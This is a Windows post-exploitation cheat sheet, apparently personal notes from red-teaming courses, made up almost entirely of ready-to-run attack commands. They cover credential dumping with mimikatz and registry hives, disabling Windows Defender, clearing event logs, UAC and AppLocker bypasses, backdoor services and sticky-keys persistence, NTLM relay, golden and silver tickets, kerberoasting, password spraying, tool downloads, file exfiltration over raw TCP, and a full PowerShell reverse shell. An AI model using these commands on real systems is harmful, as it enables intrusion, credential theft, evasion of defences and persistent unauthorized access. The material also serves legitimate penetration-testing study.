|\ __________                          __   __                         __
         | |   __     |          _____ __    __\__/_|  |_ __ ___   _____   ___ |  |\_____     
         | |  /  \    |         /  _  \  \  /  /  |_    _|  /   \ /  _  \ /  _ \  |/  _  \    
         | |  \  /___ |        /  /_\  \  \/  /|  | |  |\|   /\  \  / \  \  / \   |  /_\  \   
         | |__/    _ \|        |  _____||    |\|  | |  | |  |\|  |  |\|  |  |\|   |  _____|\  
         | |___/\  \\_\        \  \____/  /\  \|  | |  | |  | |  |  \_/  /  \_/   |  \___ \|  
         | |    /   \_|         \_____/__/ /\__\__| |__| |__| |__|\_____/ \____/__|\_____/\   
         | |   / / \___|         \____\__\/  \__\__\|\__\|\__\|\__\\____\/ \___\\__\\____\/   
         | |__/_/_____|     
         |/

Last changed: 06.09.2021

Windows post exploitation

My notes taken during some pentesting and red teaming courses.

A nice collection of further red teaming procedures can be found on https://ired.team/.

login information

username

whoami
whoami /all
net user %username%
$env:USERNAME

logged in users

query user
quser
quser /server:<target>

record user behaviour

psr /start /gui 0 /output record.zip
psr /stop

system information

version and service pack info

ver
systeminfo

environment variables

set
gci env:

current time

date /t
time /t

hostname

hostname
net config workstation
reg query hklm\system\currentcontrolset\services\tcpip\parameters /v hostname

running processes

tasklist /V
tasklist /svc
taskkill /pid 1234
taskkill /im iexplore.exe
wmic process get caption,processid,parentprocessid,commandline
Get-Process -IncludeUserName | Select-Object Id,{$_.Parent.Id},UserName,Name
Stop-Process -Name evil.exe -Force

autostart

wmic startup get

open files

openfiles /local on
openfiles /query

event logs

wevtutil query-events Security /c:10 /f:text
wevtutil clear-log Security
powershell "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

installed software

wmic product get name,vendor,version

uninstall security update

wusa /uninstall /kb:1234567 /quiet /norestart

view group policies

gpresult /user victim /z > user_gpo.txt
gpresult /user victim /scope computer /z > computer_gpo.txt
nbtstat -n
nltest /dclist:target.domain
dir \\<DC>\SYSVOL\
robocopy /e \\<DC>\SYSVOL\<target.domain>\Policies .
get-gpo -all
get-gporeport "my gpo" -reporttype xml

edit group policies

dism.exe /online /get-capabilities | findstr /i grouppolicy
dism.exe /online /add-capability /capabilityname:Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0
Get-Module -List -Name GroupPolicy
Install-WindowsFeature -Name GPMC
New-GPO -Name "Admin GPO" | New-GPLink -Target "OU=Computers,DC=target,DC=com"
Set-GPPrefRegistryValue -Name "Admin GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "%COMSPEC% /b /c /b /min \\srv1\share\backdoor.exe" -Type ExpandString
gpupdate /target:computer /force
shutdown /r /t 0

powershell

Get-History
Get-ChildItem env:
Get-Variable

find writable folders in $path

$f=$env:Path.split(";");$f[0..($f.length-2)] | % { get-acl $_} | fl Path,AccessToString

seatbelt

The tool seatbelt enumerates a lot of the current system information automatically. But be aware that windows defender will classifies seatbelt as malicious.

user management

usernames and privileges

net user
net user /domain
[adsi]"WinNT://$env:userdomain/$env:username,user" | select *
net localgroup
net group /domain
net user Administrator new_password /active:yes

create new admin user

net user admin password /add
net localgroup administrators admin /add

uac bypass

reg add "hkcu\software\classes\mscfile\shell\open\command" /t REG_SZ /d "c:\windows\system32\cmd.exe /c whoami /priv > c:\bypass.txt" /f
eventvwr.exe
reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c notepad.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f 
sdclt.exe

windows defender

Recent versions of Windows make it quite hard to disable windows defender.

disable

powershell.exe "get-service | ?{$_.name -match 'WpnUserService'} | stop-service"
powershell.exe Set-MpPreference -DisableRealtimeMonitoring 1
sc qc TrustedInstaller
sc stop TrustedInstaller
sc config TrustedInstaller binpath= "sc.exe stop WinDefend"
sc start TrustedInstaller
sc config TrustedInstaller binpath= "sc.exe config WinDefend start= disabled"
sc start TrustedInstaller
sc config TrustedInstaller binpath= "cmd.exe /c del /F /Q \"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\MsMpEng.exe\""
sc start TrustedInstaller
sc config TrustedInstaller binpath= "sc.exe config SecurityHealthService start= disabled"
sc start TrustedInstaller
sc config TrustedInstaller binpath= C:\WINDOWS\servicing\TrustedInstaller.exe
powershell.exe "get-service | ?{$_.name -match 'WpnUserService'} | start-service"

An easy alternative is to add an exclusion for a specific folder. This should persist a reboot.

exclude folders

powershell.exe Add-MpPreference -ExclusionPath C:\Users\victim\, 'C:\Program Files\'
powershell.exe Get-MpPreference | fl ExclusionPath
powershell.exe Remove-MpPreference -ExclusionPath C:\Users\victim\, 'C:\Program Files\'

hash extraction

lsass process

wce.exe
wce.exe -d

lsass process (meterpreter)

run post/windows/gather/hashdump

lsass process (mimikatz)

To get a list of available modules enter :: in mimikatz.

privilege::debug
sekurlsa::logonPasswords
token::whoami
token::elevate
lsadump::cache
lsadump::sam
sekurlsa::pth /user:Administrator /domain:. /ntlm:<admin-hash>

lsass core dump (mimikatz)

You can also create the dump using procdump (admin privileges needed) or comsvcsc.dll (nt-system privileges needed)

C:\windows\system32\rundll32 C:\windows\system32\comsvcs.dll MiniDump <LSASS_PID> lsass.dmp full"
procdump -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" exit

If lsass.exe is running as a Protected Process Light you can use PPLdump or try to disable PPL

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 0 /f

registry

To dump hashes of local accounts from the registry pwdump and cachedump from creddump7 or secretsdump from Impacket can be used.

reg save hklm\sam c:\SAM
reg save hklm\system c:\SYSTEM
reg save hklm\security c:\SECURITY
pwdump SYSTEM SAM
cachedump SYSTEM SECURITY True
secretsdump.py -sam SAM -system SYSTEM -securty SECURITY LOCAL

user privileges

If you want to extract the hash of the current user without administrator privileges you can use inveigh and create a local http server which will dump the NetNTLMv2 authentication data. This should also work if you lure another user from inside the current network onto your host when using the hostname in the url.

powershell -ep bypass "import-module inveigh.ps1; invoke-inveigh -llmnr n -fileoutput y -fileoutputdirectory c:\users\public\"
"C:\Program Files\Internet Explorer\iexplore.exe" "http://localhost/"
stop-inveigh
get-inveigh -ntlmv2

ntlm relay

Inveigh contains the powershell script inveigh-relay to relay NetNTLM authentication.

ipmo Inveigh-Relay.ps1
invoke-inveighrelay -consoleoutput y -target srv2 -command "net localgroup administrators domain\user /add" -attack execute

An incoming connection will then be used to authenticate to the target machine to execute the given command.

On linux you can use ntlmrelayx from Impacket. The default action is to dump the local NT hashes.

python3 /usr/local/bin/ntlmrelayx.py -t smb://target -smb2support --no-http-server --no-wcf-server -c 'net localgroup administrators domain\user /add'

A method to provoke the NetNTLMv2 authentication is placing a .scf file in a shared folder and wait for anyone opening the folder with the windows explorer.

[Shell]                                                                         
Command=2                                                                       
IconFile=//10.0.0.1/test.ico                                              
[Taskbar]                                                                       
Command=ToggleDesktop

If you create a .lnk file with powershell you could also use NetNTLMv2 authentication via http if you provide a hostname from the domain

$wsh = new-object -ComObject wscript.shell
$shortcut = $wsh.CreateShortcut("\\srv1\share\test.lnk")
$shortcut.IconLocation = "http://wkstn1/test.ico"
$shortcut.Save()

domain controller

To extract password hashes from an active directory you will need the file ntds.dit and the SYSTEM registry hive from the domain controller. The location of the ntds.dit can be found in the registry.

reg query hklm\system\currentcontrolset\services\ntds\parameters

Impacket can extract the hashes in one step

secretsdump.py -ntds ntds.dit -system SYSTEM -just-dc-ntlm LOCAL > hashes.txt

group policiy preferences

Sometimes you can find encrypted passwords in scheduled tasks configured via group policies

findstr /S /I cpassword \\<DC>\sysvol\<target.domain>\policies\*.xml

The cpassword is encrypted with a well known 32-byte AES key

4e 99 06 e8  fc b6 6c c9  fa f4 93 10  62 0f fe e8
f4 96 e8 06  cc 05 79 90  20 9b 09 a4  33 b6 6c 1b

PowerSploit offers a script to search and decrypt these passwords.

Get-GPPassword.ps1 -Server <DC>

enable wdigest cleartext password storage

reg add hklm\system\currentcontrolset\control\securityproviders\wdigest /v UseLogonCredential /t REG_DWORD /d 1 /f

network configuration

network interfaces

ipconfig /all
netsh int ip set address "local area connection" static 10.0.0.11 255.255.255.0

modify routes

route print
route add 10.1.1.0 mask 255.255.255.0 192.168.11.3

domain controller

whoami
set logonserver
set userdnsdomain
set userdomain
nltest /dsgetdc:<DOMAIN>
nltest /dclist:<DoMAIN>

install powershell active directory module

dism.exe /online /get-capabilities | findstr /i rsat
dism.exe /online /add-capability /capabilityname:Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0
Install-windowsfeature -name AD-Domain-Services -IncludeManagementTools
ipmo activedirectory
Get-ADDomain
Get-ADUser -Filter * | ft name,samaccountname,userprincipalname,enabled
Get-ADComputer -Filter * | ft dnshostname,enabled

adfind

adfind.exe

adfind.exe -sc u:* -dn
adfind.exe -sc u:* > userlist.txt
adfind.exe -default -f "objectcategory=organizationalUnit" -dn
adfind.exe -b "OU=NewYork,DC=Contoso,DC=com" -s one -dn

dns requests

nslookup hostname
for /L %i in (1,1,254) do nslookup "<IP-PREFIX>.%i" | findstr "Name:"

trace route

tracert host

open ports

netstat -nabo

enable IP forwarding

reg add hklm\system\currentcontrolset\services\remoteaccess /v Start /t REG_DWORD /d 2 /f
sc start remoteaccess

reg add hklm\system\currentcontrolset\services\tcpip\parameters /v IpEnableRouter /t REG_DWORD /d 1 /f

port forwarding

netsh in portproxy add v4tov4 listenport=8080 connectaddress=10.0.0.99 connectport=80
netsh in portproxy delete v4tov4 listenport=8080 connectaddress=10.0.0.99 connectport=80

run cmd.exe as other user

runas /netonly /user:TARGET\user cmd.exe

ssh

Windows 10 newer then Version 1709 has a native ssh client

ssh -o StrictHostKeyChecking=no -R 3389:127.0.0.1:3389 user@whatever

firewall

netsh advfirewall firewall show rule name=all dir=in
netsh advfirewall firewall set rule group="remote desktop" new enable=yes
netsh advfirewall firewall add rule name="Allow 4444" dir=in action=allow protocol=TCP localport=4444
netsh advfirewall firewall delete rule name="Allow 4444"
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off

remote wmi

Invoke-CimMethod -ComputerName <target> -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = 'notepad.exe';}

psexec

PsExec64.exe -accepteula \\dc1 -u Administrator -p SecretPassword123 cmd
PsExec64.exe -accepteula \\dc1 -s cmd

enable remote desktop

reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall show rule name=all | find /i "remote" | find /i "desktop"
netsh advfirewall firewall set rule group="remote desktop" new enable=yes

login (from linux)

xfreerdp /u:user /p:password /v:<target>

download file

certutil.exe -urlcache -split -f "http://1.2.3.4/tool.zip" t.zip

As certutil.exe is known to be used by malicious actors you should prefer powershell.

(New-Object Net.WebClient).DownloadString("http://1.2.3.4/")
(New-Object Net.WebClient).DownloadFile("http://1.2.3.4/tool.zip", "t.zip")
Expand-Archive t.zip .

In powershell > 3.0 you can use Invoke-WebRequest.

(Invoke-WebRequest -UseBasicParsing -Uri http://1.2.3.4/).RawContent
Invoke-WebRequest -UseBasicParsing -Uri http://1.2.3.4/tool.exe -OutFile t.exe -Method POST -Body @{auth='password'}

Short version:

(iwr http://10.11.12.1/tool.exe).Content > t.exe

transfer file via clipboard

zip -qr - file | base64 | xclip -selection clipboard
[System.IO.File]::WriteAllBytes("file.zip", [System.Convert]::FromBase64String([IO.File]::ReadAllText("file.b64")))
expand-archive file.zip

tcp sockets with powershell

[IO.StreamReader]::new(([Net.Sockets.TcpClient]::new('1.2.3.4', 12345)).GetStream()).ReadLine() > file.txt
gc filename.zip -raw | % {$s=[IO.StreamWriter]::new(([Net.Sockets.TcpClient]::new('1.2.3.4', 12345)).GetStream());$s.Write($_);$s.Flush();$s.Dispose()}

file system

list disks

wmic logicaldisk get caption,description,volumename
wmic logicaldisk get caption,filesystem,freespace,name,size

searching

type file.txt | find /n /i "string"
dir /s /r | find ":$DATA"
forfiles /p c:\users /s /m *.exe /c "cmd /c echo @fdate @ftime @fsize @file"
attrib /S /D

powershell

(Get-ChildItem c:\ -Recurse -File *.zip).VersionInfo.FileName
Get-ChildItem c:\ -Recurse | Select-String "password" | Group Path | Select Name
Get-Content file.txt | Select-String -Pattern "^FAIL" -CaseSensitive
[io.file]::WriteAllBytes('sc32.bin',$sc32)

file acls

icacls file.txt
get-acl -path file.txt | fl

hexdump

certutil -encodehex c:\some\binary.exe hexdump.txt
Format-Hex c:\some\binary.exe

volume shadow copy

Windows Server allows invoking shadow copies via vssadmin or wmic.

vssadmin create shadow /for=c:
wmic shadowcopy call create volume=c:\

Then you can copy locked files from the shadow copy.

vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM SYSTEM.bak

On workstations the access to GLOBALROOT seems to be restricted. Here I use the Extensible Storage Engine Utilities

esentutl /y /vss c:\windows\system32\config\SYSTEM /d c:\users\public\SYSTEM

A good alternative is RawCopy.

disable bitlocker

manage-bde -status
manage-bde -off c:

scheduled tasks

list tasks

schtasks.exe

create task

schtasks /create /tn test /sc once /st 13:37 /ru user2 /rp Pa$$w0rd /tr "cmd /c echo Hello > c:\users\user2\out.txt" /f
schtasks /run /tn test
schtasks /delete /tn test /f

services

list services

sc query
get-service | fl *
wmic service get name, startmode, state, startname, pathname
Get-WmiObject win32_service | ft name, startmode, state, startname, pathname
get-acl (Get-WmiObject win32_service | ?{$_.Name -like '*vuln*'} | select -expandproperty pathname).split(" ")[0]

create service

sc create new_service binpath= "cmd /c start /b c:\backdoor.exe" start=auto error=ignore
sc qc new_service

modify service

sc config new_service binpath= "cmd /c start /b c:\new_backdoor.exe"
sc start new_service

show service acls

sc.exe sdshow some_service | findstr ";" | ConvertFrom-SddlString | select -expandproperty discretionaryacl

Look for WriteData in the permissions for NT AUTHORITY\Authenticated Users. More on can be found in the Microsoft Docs.

runas with powershell

powershell "$s=convertto-securestring 'Pa$$w0rd' -asplaintext -force;$c=new-object system.management.automation.pscredential('.\Administrator',$s);start-process cmd.exe -argumentlist '/c start /b c:\backdoor.exe' -credential $c"

windows network

netbios discovery (from linux)

nbtscan -v 192.168.11.0/24
nmblookup -A <target>
nmap 192.168.11.2 --script smb-enum-users.nse
nmap 192.168.11.2 --script "smb-vuln*"
rpcclient -U "" 192.168.11.2

netbios discovery (from windows)

nbtstat -A <target>
net view <target> /all

rpcclient

rpcclient -U user 10.168.11.2
$> srvinfo
$> enumdomains
$> enumdomusers

server message block

smb file share

net share
net share test=c:\test
net use x: \\<target>\test
net use x: /delete
net share test /delete

mount share in linux

smbclient -L target -U '' -N
smbclient //target/share -U '' -N -c dir
smbclient //target/share -U '' -N -c 'cd docs; get secret.txt'
smbclient //target/share -U '' -N -c 'mkdir tmp; cd tmp; put evil.exe'
nmap --script smb-enum-shares share.wey-tech.com -p 445
mount -t cifs //<target>/test /mnt/cifs -o username=user

create smb server in linux

Impacket contains a simple smb server script.

python smbserver.py share /tmp/share
impacket-smbserver share /tmp/share

remote command execution

psexec -accepteula -u Administrator -p password //<target> <command>
winexe -U Administrator%password //<target> <command>
rpcclient -U Administrator <target>

extract NetNTMLv2 credentials from pcap

With NTLMssp-Extract you can extract all captured NetNTLMv2 authentications in hashcat or JohnTheRipper compatible format.

ntlmssp_extract.py -f 0 -p smb.pcap

windows domain

join domain

Needs local administrator privileges and valid user credentials for the domain.

add-computer -domainname target -credential user_xy -restart
remove-computer -unjoindomaincredential user_xy -restart

join organisational unit

import-module .\powersploit\Recon\Recon.psm1
get-netdomaincontroller -domain target -credential user_xy
get-netou -domaincontroller dc1.target.com -credential user_xy -fulldata
add-computer -domainname target -oupath "OU=Domain Controllers,DC=target,DC=com" -newname dc2 -credential user_xy
restart-computer

pass the ticket

klist
klist tgt
klist purge

To export and reuse tickets in a Pass-The-Ticket attack you can use mimikatz

cd %temp%
sekurlsa::tickets /export
kerberos::ptt [...]...-Administrator@krbtgt-target.com.kirbi
misc::cmd

If there is no TGT available maybe a service ticket can be found and reused for that specific service.

golden ticket

To acquire the hash of the krbtgt service you will need domain administrator privileges. With these you can copy the ntds.dit (see above) or use mimikatz

lsadump::dcsync /domain:target.com /user:krbtgt

With this information anyone can create a TGT containing the SID of the domain administrator (-500) and use it in a Pass-The-Ticket attack.

kerberos::golden /domain:target.com /sid:<DOMAIN_SID> /rc4:<NTLM_HASH> /user:whatever

If a nonexistent username is chosen the TGT will become invalid after 20 minutes.

silver ticket

If you have the ntlm hash of a machine account you can create service tickets for the services running on the machine.

kerberos::golden /domain:target.com /sid:<DOMAIN_SID> /rc4:<NTLM_HASH /user:whatever /target:fileserver.target.com /service: cifs /ptt
misc::cmd

Machine account passwords can be extracted from the registry

lsadump.py SYSTEM SECURITY true
secretsdump.py -system SYSTEM -security SECURITY LOCAL

You will need the ntlm hash from the machine account plaintext password.

echo <PLAINTEXT_PASSWORD> | sed 's/../\\x&/g'
perl -e 'use Digest::MD4 "md4_hex"; print md4_hex("<ESCAPED_HEX_STRING>")."\n";'

kerberoasting

Sometimes services are not associated to a machine account but to a dedicated service logon account. If a weak password is setup for this service logon account it can be optained by cracking an encrypted service ticket. This can be done with user privileges.

setspn -T infected -Q */* | select-string -pattern "CN=User|CN=Managed" -context 0,1
$Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel')
$Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -argumentlist "IIS/server.target.com:80"
$TicketHexStream = [System.BitConverter]::ToString($Ticket.GetRequest()) -replace "-"
[System.Collections.ArrayList]$Parts = ($TicketHexStream -replace '^(.*?)04820...(.*)','$2') -Split "A48201"
$Parts.RemoveAt($Parts.Count - 1)
$CipherText = $Parts -join "A48201"
$Hash = "$($CipherText.Substring(0,32))`$$($CipherText.Substring(32))"
$HashFormat = "`$krb5tgs`$23`$*IIS/server.target.com*`$$Hash"

The hash should have the format $krb5tgs$<ETYPE>$*<ACCOUNT>$<DOMAIN>$<SPN>*$<HASH> where everything between the * is optional. It can be cracked with hashcat or john

hashcat -m 13100 hashfile wordlist --force
john --format=krb5tgs --wordlist=wordlist hashfile

Alternatviely you can run Invoke-Kerberoast.ps1 from the EmpireProject to acquire the hash in one go.

rubeus

Most of the attacks described above can also be done with the tool rubeus.

rubeus.exe triage /service:krbtgt
rubeus.exe dump /service:krbtgt /luid:0x1053 /nowrap
rubeus.exe ptt /ticket:<b64_ticket>

If you need the raw file you can use powershell

[System.IO.File]::WriteAllBytes("C:\users\user\desktop\TGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))

microsoft exchange

mail sniper

MailSniper is a powershell module for pentesting Microsoft Exchange. The module can enumerate valid usernames by a timing attack.

ipmo MailSniper.ps1
Invoke-DomainHarvestOWA -ExchHostname exch.target.com
Invoke-UsernameHarvestOWA -ExchHostname exch.target.com -Domain TARGET -UserList usernames.txt -OutFile valid-users.txt
Invoke-PasswordSprayOWA -ExchHostname exch.target.com -UserList valid-users.txt -Password Password1
Get-GlobalAddressList -ExchHostname exch.target.com -UserName TARGET\username -Password Password1 -OutFile gal.txt

The domain name can also be retreived manually with curl

curl -s -ki https://exch.target.com/ews/exchange.asmx -H "Authorization: NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==" | grep -o "NTLM .*" | cut -b 6- | base64 -d | strings -el
curl -s -ki https://exch.target.com/autodiscover/autodiscover.xml -H "Authorization: NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==" | grep -o "NTLM .*" | cut -b 6- | base64 -d | strings -el

dpapi

The Windows Data Protection API (dpapi) offers transparent methods for encrypted storage of data. If you want to decrypt this data mimikatz can be used.

dpapi::protect /data:"testdata" /out:"blob.bin"
dpapi::blob /in:"blob.bin" /unprotect

The password used to protect a masterkey can be cracked.

attrib /S %appdata%\microsoft\protect\*
dpapi::blob /in:"blob.bin"
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<SID>\<MASTERKEY_FILE>"

Hashcat supports encrypted masterkeys in the following format:

$DPAPImk$<VERSION>*<CONTEXT>*<SID>*<ENC_METHOD>*<HASH_ALG>*<ROUNDS>*<SALT>*<ENC_KEY_LEN>*<ENC_KEY>
    VERSION:        1=des3+sha1; 2=aes256+sha512
    CONTEXT:        1=local; 2=domain
    ENC_METHOD:     des3 || aes256
    HASH_ALG:       sha1 || sha512
    ENC_KEY_LEN:    208 || 288

hashcat -m 15900 dpapi_mk_v2.hash wordlist -O

With the cracked password the masterkey and with it the dpapi blob can be decrypted.

dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<SID>\<MASTERKEY_FILE>" /password:<PASSWORD>
dpapi::blob /in:"blob.bin" /masterkey:<MASTERKEY>

The Windows Credential Manager uses Windows Vaults to store credentials for websites or network resources

vaultcmd.exe /list
vaultcmd.exe /listcreds:"Windows Credentials" /all

These can also be decrypted by mimikatz if it is running in the users context or if you know his password.

dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<SID>\<MASTERKEY_FILE>" /rpc
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<SID>\<MASTERKEY_FILE>" /password:P@ssw0rd /protected
papi::cred /in:"%localappdata%\Microsoft\Credentials\<CREDENTIAL_FILE>" /masterkey:<MASTERKEY>

default browser

reg query hkcu\software\microsoft\windows\shell\associations\urlassociations\http\userchoice\ /v ProgId

recent files

dir %APPDATA%\Microsoft\Windows\Recent

parsing outlook mailbox

The libpst package contains tools for converting outlook .pst files

readpst -o extracted_mails mailbox.pst

persistent login bypass

sticky key

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f

ease of access

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f

backconnect shell

powershell

$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);
$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    ;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
$client.Close()

metasploit hta_server

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f hta-psh > shell.hta
c:\\windows\\system32\\mshta.exe http://10.10.10.10/shell.hta

metasploit smb_delivery

c:\\windows\\system32\\rundll32.exe \\\\10.11.12.1\\share\\file_name.dll,0

Other methods can be found on hacktricks.xyz.

hiding file extension

‮cod.yrammusevituc‭new.exe

&#x202e;cod.yrammusevituc&#x202d;new.exe

applocker bypass

msbuild.exe

c:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe inline_task.csproj

html application

calc.hta

<html>
<head>
<title>Running calc.exe ...</title>
<script language="Javascript">
new ActiveXObject("WScript.Shell").run("c:/windows/sysnative/calc.exe", 1, false);
</script>
</head>
<body></body>
</html>

execute command with lnk file

$wsh = new-object -ComObject wscript.shell
$shortcut = $wsh.CreateShortcut("test.lnk")
$shortcut.targetpath ="c:\windows\system32\cmd.exe"
$shortcut.arguments = "/c powershell get-date -format 'dd-MMM-yyyy HH:mm:ss' >> %temp%\log.txt"
$shortcut.save()

unsafe DLL loading

procmon.exe (SysinternalsSuite)

Result is "NAME NOT FOUND"      (-> Include)
Path ends with ".dll"           (-> Include)
Path begins with "c:\windows"   (-> Exclude)
Path begins with "c:\program"   (-> Exclude)